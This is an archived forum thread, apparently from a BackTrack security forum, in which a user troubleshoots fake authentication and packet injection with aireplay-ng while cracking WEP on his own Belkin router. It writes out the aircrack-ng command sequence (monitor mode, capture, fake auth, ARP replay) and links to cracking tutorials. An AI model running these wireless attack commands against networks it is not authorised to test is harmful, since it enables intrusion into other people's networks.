Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: Aireplay Using Fake Auth

  1. #1
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    8

    Default Aireplay Using Fake Auth

    Ok, am not been daft or stupid, but i would like some help with this.

    I've got a Belkin 802.11g F5D7011 wirelesscard & Belkin54g Router i can get monitor mode no probs, i can do a airmon-ng eth1 & works fine, however my next step is aireplay-ng -1 0 -e ''myrouter'' -a 00:11:22:33:44:55:66 (MAC of router) -h 00:11:22:33:44:55:66 (MAC of wirelesscard) eth1 & I still fail 2 inject packets?? can anyone shed a bit of light on this please, as if i cant inject - then its pointless - or ..... is there an alt method of doing this.

    Thanks

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by byt3m3 View Post
    Ok, am not been daft or stupid, but i would like some help with this.

    I've got a Belkin 802.11g F5D7011 wirelesscard & Belkin54g Router i can get monitor mode no probs, i can do a airmon-ng eth1 & works fine, however my next step is aireplay-ng -1 0 -e ''myrouter'' -a 00:11:22:33:44:55:66 (MAC of router) -h 00:11:22:33:44:55:66 (MAC of wirelesscard) eth1 & I still fail 2 inject packets?? can anyone shed a bit of light on this please, as if i cant inject - then its pointless - or ..... is there an alt method of doing this.

    Thanks
    the -1 option in aireplay is to assosiate and athenticate. This is not just going to magicly inject packets for you. First you should search as this topic has been covered in masterly detail at least 111 times in this forum and second the best way to get a informative response is to post your commands from start to the error so we can see whats going on. We do not have ossmosis and unless you want to give me your IP so I can remotely run your machine for you then I suggest posting as much info as possible.


    POOP IN = POOP OUT

  3. #3
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    And then the chocolate highway opens!!!
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by -=Xploitz=- View Post
    And then the chocolate highway opens!!!
    Im just keeping with the anal theme of the day

  5. #5
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    8

    Default re: aireplay using fake auth

    steps i done are as follows

    airmon-ng stop eth1
    airmon-ng start eth1

    interface chipset monitor mode enabled
    **new shell**
    airodump-ng -c 11 --bssid 00:14:6C:7E:40:80 -w output eth1

    CH 11 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:14:6C:7E:40:80 42 100 5240 0 0 11 54 WEP WEP belkin54g

    **new shell**

    aireplay-ng -1 0 -e belkin54g -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 eth1
    (-h 00:0F:B5:88:AC:82 is my card MAC addresss)
    then i get
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    18:18:20 Sending Authentication Request
    & Its as if it times out saying failed
    reasons could be
    your mac address has filtering enabled (which it doesnt)
    your wireless card doesnt support injection - (which it DOES)
    your not near your access point (which i am - it's my router)

    so pretty much I cant really move on from here unless i can get the following
    Success looks like:

    18:18:20 Sending Authentication Request
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful :-)

    **New Shell**
    aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 eth1

    Saving ARP requests in replay_arp-0321-191525.cap
    You should also start airodump-ng to capture replies.

    the following steps have been taken from back track website simple wep crack page i cant paste the link as i have not submitted enough posts

    what I have typed here in this reply to the post the MAC address are copied & pasted in this forum i have left the MAC address according to the link as i dont know mine but you get what i mean I am using MY MAC address when am actually doing this at home - so again any pointers is appreciated

  6. #6
    Junior Member
    Join Date
    Oct 2006
    Posts
    33

    Default

    When I'm down the street at a friend's apartment and I've tried to crack the WEP on my access point, I've had some trouble because the signal is weak. Sometimes I have to associate and authenticate multiple times to get it to work. If your AP is just being "picky", the WEP cracking tutorial on the wiki has another type of associate you can do that sends keep alive packets. I've tried this and it worked for me.


    Code:
    aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a "AP Mac" -h "Your Mac" eth1

  7. #7
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    have you lock your card on ap channel (iwconfig eth0 channel XX) ?
    have you lower you rate at 1M (iwconfig eth0 rate 1M) ?

    this settings are necessary for association(the channel one more than the rate one)
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  8. #8
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    8

    Default

    i have tried that method too - am gona doublecheck agian when i go home 2nt & use the aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a "AP Mac" -h "Your Mac" eth1 command you put & see how it goes - tks for reply

  9. #9
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by byt3m3 View Post
    i have tried that method too - am gona doublecheck agian when i go home 2nt & use the aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a "AP Mac" -h "Your Mac" eth1 command you put & see how it goes - tks for reply
    Ther is a disclaimer on the aircrack site that says "tough shit" somtimes it wont work

  10. #10
    Junior Member
    Join Date
    Oct 2006
    Posts
    33

    Default

    No prob, that method worked for me. When it works, instead of saying association successful, it will just continually send keep alive packets every few seconds. Here's a link to the tutorial. It explains things in a lot of detail. Good luck

    aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •